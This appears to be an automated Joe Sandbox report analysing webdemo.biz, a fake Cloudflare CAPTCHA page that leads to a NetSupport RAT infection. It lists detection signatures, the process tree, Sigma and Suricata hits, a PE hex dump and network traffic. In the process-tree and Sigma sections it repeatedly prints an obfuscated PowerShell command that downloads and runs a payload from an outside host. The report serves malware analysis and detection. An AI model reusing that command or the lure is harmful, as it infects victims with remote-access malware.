Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://webdemo.biz/

Overview

General Information

Sample URL:https://webdemo.biz/
Analysis ID:1545769
Infos:

Detection

NetSupport RAT, CAPTCHA Scam
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webdemo.biz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 7940 cmdline: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 1284 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 5940 cmdline: attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • client32.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            00000013.00000000.1798242317.000000000075F000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000013.00000000.1798242317.0000000000752000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000013.00000002.2445421109.000000006C620000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000013.00000002.2432544549.00000000026A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000013.00000002.2427181578.0000000000752000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 3 entries
                      SourceRuleDescriptionAuthorStrings
                      1.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA ScamJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2848, ProcessName: svchost.exe

                        Remote Access Functionality

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\NSM.LIC
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-31T00:15:42.254947+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:42.254947+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:42.254947+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:43.896654+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:43.896654+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:43.896654+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:45.856988+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:45.856988+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:45.856988+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.019053+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.019053+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.019053+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.243368+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.243368+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.243368+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.411456+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.411456+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.411456+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.663800+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.663800+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.663800+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.866278+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.866278+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:46.866278+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:52.195934+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:52.195934+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:52.195934+010028032742Potentially Bad Traffic192.168.2.1649737166.1.160.21180TCP
                        2024-10-31T00:15:53.167434+010028032742Potentially Bad Traffic192.168.2.1649739166.1.160.21180TCP
                        2024-10-31T00:15:53.167434+010028032742Potentially Bad Traffic192.168.2.1649739166.1.160.21180TCP
                        2024-10-31T00:15:53.167434+010028032742Potentially Bad Traffic192.168.2.1649739166.1.160.21180TCP
                        2024-10-31T00:15:55.980864+010028032742Potentially Bad Traffic192.168.2.1649740166.1.160.21180TCP
                        2024-10-31T00:15:55.980864+010028032742Potentially Bad Traffic192.168.2.1649740166.1.160.21180TCP
                        2024-10-31T00:15:55.980864+010028032742Potentially Bad Traffic192.168.2.1649740166.1.160.21180TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-31T00:15:03.265705+010028277451Malware Command and Control Activity Detected192.168.2.164974292.255.85.135443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        Phishing

                        barindex
                        Source: https://webdemo.biz/LLM: Score: 8 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'webdemo.biz' does not match the legitimate domain for CloudFlare., The domain 'webdemo.biz' is generic and does not have any direct association with CloudFlare., The use of a '.biz' domain extension is unusual for a well-known brand like CloudFlare, which typically uses '.com'., The input fields 'u, n, k, n, o, w, n' do not provide any clear context or association with CloudFlare services. DOM: 1.0.pages.csv
                        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                        Source: https://webdemo.biz/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....
                        Source: https://webdemo.biz/HTTP Parser: No favicon
                        Source: https://webdemo.biz/HTTP Parser: No favicon
                        Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exeFile opened: C:\Users\user\AppData\Roaming\HzYATQ\MSVCR100.dll
                        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49719 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49721 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49722 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49728 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.84.254:443 -> 192.168.2.16:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49735 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 166.1.160.211:443 -> 192.168.2.16:49736 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49738 version: TLS 1.2
                        Source: chrome.exeMemory has grown: Private usage: 27MB later: 38MB

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49742 -> 92.255.85.135:443
                        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 30 Oct 2024 23:15:53 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 23:15:53 GMTContent-Type: image/pngContent-Length: 396664Last-Modified: Mon, 21 Oct 2024 07:35:59 GMTConnection: keep-aliveETag: "6716045f-60d78"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49737 -> 166.1.160.211:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49739 -> 166.1.160.211:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49740 -> 166.1.160.211:80
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
